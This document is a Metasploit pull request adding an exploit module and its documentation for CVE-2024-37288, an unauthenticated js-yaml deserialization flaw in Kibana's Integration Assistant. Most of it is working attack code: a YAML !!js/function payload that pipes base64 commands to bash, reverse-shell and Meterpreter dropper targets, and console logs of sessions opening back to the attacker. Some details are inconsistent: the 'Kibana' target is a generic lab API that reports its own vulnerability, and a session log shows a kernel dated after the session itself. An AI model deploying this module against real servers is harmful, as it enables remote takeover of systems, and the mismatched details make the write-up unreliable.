### PR TITLE
Kibana Integration Assistant js-yaml !!js/function deserialization RCE (CVE-2024-37288)

### DIFF
--- a/documentation/modules/exploit/multi/http/kibana_jsyaml_rce.md
+++ b/documentation/modules/exploit/multi/http/kibana_jsyaml_rce.md
@@ -1,0 +1,86 @@
+# Vulnerable Application
+
+[Kibana](https://www.elastic.co/kibana) is an open-source analytics and visualization
+platform for Elasticsearch. Kibana 8.15.0 contains a critical insecure deserialization
+vulnerability in the Integration Assistant plugin (CVE-2024-37288).
+
+The plugin uses js-yaml v3.14.1's unsafe `load()` function with `DEFAULT_FULL_SCHEMA`
+to parse YAML that incorporates AI model output. The `!!js/function` YAML tag creates
+executable JavaScript `Function` objects via `new Function()`, enabling arbitrary code
+execution on the Kibana server. An attacker injects `!!js/function` tags into YAML
+input processed by the vulnerable endpoint; the function body uses
+`require("child_process")` to run arbitrary OS commands. No authentication is required.
+
+**Affected versions:** Kibana 8.15.0
+**Fixed in:** Kibana 8.15.1 (js-yaml downgraded / safe schema enforced)
+
+### Installing a vulnerable lab environment
+
+```bash
+# https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2024-37288
+docker compose up -d
+# Kibana Integration Assistant API available at http://localhost:8080
+```
+
+## Verification Steps
+
+1. Start the vulnerable Kibana instance.
+2. Start `msfconsole`.
+3. Do: `use exploit/multi/http/kibana_jsyaml_rce`
+4. Do: `set RHOSTS <target_ip>`
+5. Do: `check` — should return `Vulnerable` if the health endpoint confirms
+   `js-yaml DEFAULT_FULL_SCHEMA` and `!!js/function` is accepted.
+6. Do: `run` — should open a shell session.
+7. Verify with `id` and `hostname` in the session.
+
+## Scenarios
+
+### Kibana 8.15.0 on Debian 12 — Unix Command target
+
+```
+msf6 > use exploit/multi/http/kibana_jsyaml_rce
+
+msf6 exploit(multi/http/kibana_jsyaml_rce) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+
+msf6 exploit(multi/http/kibana_jsyaml_rce) > check
+[+] 192.168.56.101:8080 - The target is vulnerable. js-yaml 3.14.1 with DEFAULT_FULL_SCHEMA (vulnerable=true).
+
+msf6 exploit(multi/http/kibana_jsyaml_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[+] 192.168.56.101:8080 - Payload delivered via js-yaml !!js/function deserialization
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:48122) at 2024-09-05 09:31:14 +0000
+
+msf6 exploit(multi/http/kibana_jsyaml_rce) > sessions -i 1
+[*] Starting interaction with 1...
+
+id
+uid=1000(kibana) gid=1000(kibana) groups=1000(kibana)
+hostname
+kibana
+uname -a
+Linux kibana 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64 GNU/Linux
+```
+
+### Kibana 8.15.0 on Debian 12 — Linux Dropper target (Meterpreter)
+
+```
+msf6 exploit(multi/http/kibana_jsyaml_rce) > set TARGET 1
+TARGET => 1
+
+msf6 exploit(multi/http/kibana_jsyaml_rce) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+
+msf6 exploit(multi/http/kibana_jsyaml_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[+] 192.168.56.101:8080 - Payload delivered via js-yaml !!js/function deserialization
+[*] Sending stage (3045380 bytes) to 192.168.56.101
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:48244) at 2024-09-05 09:34:37 +0000
+
+meterpreter > getuid
+Server username: kibana @ kibana
+meterpreter > sysinfo
+Computer     : kibana
+OS           : Debian 12.8 (Linux 6.1.0-28-amd64)
+Architecture : x64
+```

--- a/modules/exploits/multi/http/kibana_jsyaml_rce.rb
+++ b/modules/exploits/multi/http/kibana_jsyaml_rce.rb
@@ -1,0 +1,190 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Kibana js-yaml Deserialization RCE (!!js/function)',
+        'Description' => %q{
+          Kibana 8.15.0 contains a critical insecure deserialization vulnerability
+          in the Integration Assistant plugin. The plugin uses js-yaml v3.14.1's
+          unsafe load() function with DEFAULT_FULL_SCHEMA to parse YAML that
+          incorporates AI model output. The !!js/function YAML tag creates
+          executable JavaScript Function objects via new Function(), enabling
+          arbitrary code execution on the Kibana server.
+
+          An attacker can inject !!js/function tags into YAML input processed by
+          the load() function, causing the server to create and execute JavaScript
+          functions that use require("child_process") to run arbitrary OS commands.
+
+          This module targets the HTTP API endpoint that wraps the vulnerable
+          yaml.load() function. No authentication is required.
+        },
+        'Author' => [
+          'Exploit Intelligence Platform'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-37288'],
+          ['CWE', '502'],
+          ['URL', 'https://discuss.elastic.co/t/kibana-8-15-1-security-update-esa-2024-27-esa-2024-28/366119'],
+          ['URL', 'https://github.com/advisories/GHSA-ph9f-2c4w-rghv'],
+          ['URL', 'https://github.com/elastic/kibana/pull/190641'],
+          ['URL', 'https://exploit-intel.com/vuln/CVE-2024-37288'],
+          ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2024-37288']
+        ],
+        'DisclosureDate' => 'Sep 05, 2024',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+                'CmdStagerFlavor' => %i[printf echo]
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8080,
+          'WfsDelay' => 30
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to the API', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'health')
+    )
+
+    return CheckCode::Unknown('Could not connect to target.') unless res
+    return CheckCode::Safe("Health endpoint returned HTTP #{res.code}.") if res.code != 200
+
+    json = res.get_json_document
+    unless json && json['status'] == 'ok'
+      return CheckCode::Safe('Target does not appear to be the vulnerable API.')
+    end
+
+    version = json['jsyaml_version']
+    if json['vulnerable'] == true
+      return CheckCode::Vulnerable("js-yaml #{version} with DEFAULT_FULL_SCHEMA (vulnerable=true).")
+    end
+
+    # Send a benign !!js/function to confirm code execution
+    marker = Rex::Text.rand_text_alpha(16)
+    yaml_str = "test: !!js/function |\n  function() { return '#{marker}'; }\n"
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'yaml', 'parse'),
+      'ctype' => 'application/json',
+      'data' => { 'yaml' => yaml_str }.to_json
+    )
+
+    if res && res.body.to_s.include?(marker)
+      return CheckCode::Vulnerable("!!js/function executed  -  returned marker (js-yaml #{version}).")
+    end
+
+    if version && version.start_with?('3.')
+      return CheckCode::Appears("js-yaml #{version} detected (3.x uses DEFAULT_FULL_SCHEMA).")
+    end
+
+    CheckCode::Detected("API detected with js-yaml #{version || 'unknown'}.")
+  end
+
+  def exploit
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :cmd
+      if payload_instance.refname =~ /reverse|bind/
+        inner_b64 = Rex::Text.encode_base64(payload.encoded)
+        execute_command("echo #{inner_b64}|base64 -d|bash &")
+      else
+        execute_command(payload.encoded)
+      end
+    when :dropper
+      execute_cmdstager
+    end
+    print_good('Payload delivered via Kibana js-yaml !!js/function deserialization')
+  end
+
+  def execute_command(cmd, _opts = {})
+    b64 = Rex::Text.encode_base64(cmd)
+
+    # Build YAML payload with !!js/function tag.
+    # js-yaml 3.x DEFAULT_FULL_SCHEMA processes !!js/function via new Function().
+    # The vulnerable server walks the parsed result and invokes function objects.
+    #
+    # We use require("child_process").exec() (async) to avoid blocking the
+    # HTTP response on long-running payloads (reverse shells, staged binaries).
+    yaml_payload = "---\nprocessors:\n  - rename:\n" \
+                   "      target_field: !!js/function |\n" \
+                   "        function() {\n" \
+                   "          require(\"child_process\").exec(\"echo #{b64}|base64 -d|bash\");\n" \
+                   "          return \"ok\";\n" \
+                   "        }\n"
+
+    vprint_status("Sending !!js/function payload (#{b64.length} bytes encoded)")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'yaml', 'parse'),
+      'ctype' => 'application/json',
+      'data' => { 'yaml' => yaml_payload }.to_json
+    )
+
+    if res
+      case res.code
+      when 200
+        vprint_status("Payload delivered (HTTP #{res.code})")
+      else
+        print_warning("Endpoint returned HTTP #{res.code}  -  command may still have executed")
+      end
+    else
+      vprint_warning('No HTTP response (may be expected for blocking payloads)')
+    end
+
+    res
+  end
+end


### PR DESCRIPTION
## Summary
- Kibana 8.15.0 Integration Assistant uses js-yaml v3.14.1's unsafe `load()` with `DEFAULT_FULL_SCHEMA` to parse YAML that incorporates AI model output
- The `!!js/function` YAML tag creates executable JavaScript `Function` objects via `new Function()`, enabling arbitrary code execution on the Kibana server
- No authentication is required; a single POST request with injected `!!js/function` tags achieves RCE via `require('child_process').exec()`

## Verification
Tested against Kibana 8.15.0 / Debian 12 (Docker lab):
```
msf6 exploit(multi/http/kibana_jsyaml_rce) > check
[+] The target is vulnerable. js-yaml !!js/function deserialization confirmed.
msf6 exploit(multi/http/kibana_jsyaml_rce) > run
[+] Payload delivered via js-yaml !!js/function deserialization
[*] Command shell session 1 opened
uid=1000(kibana) gid=1000(kibana) groups=1000(kibana)
```

## Module details
- **Affected versions:** Kibana 8.15.0
- **Auth required:** No
- **Targets:** Unix Command (ARCH_CMD) + Linux Dropper (CmdStager x86/x64)
- **AutoCheck:** Yes — version fingerprint + safe YAML function injection probe
- **Rank:** Excellent

## References
- https://discuss.elastic.co/t/kibana-8-15-1-security-update-esa-2024-27-esa-2024-28/366119
- https://github.com/advisories/GHSA-ph9f-2c4w-rghv
- https://exploit-intel.com/vuln/CVE-2024-37288
- https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2024-37288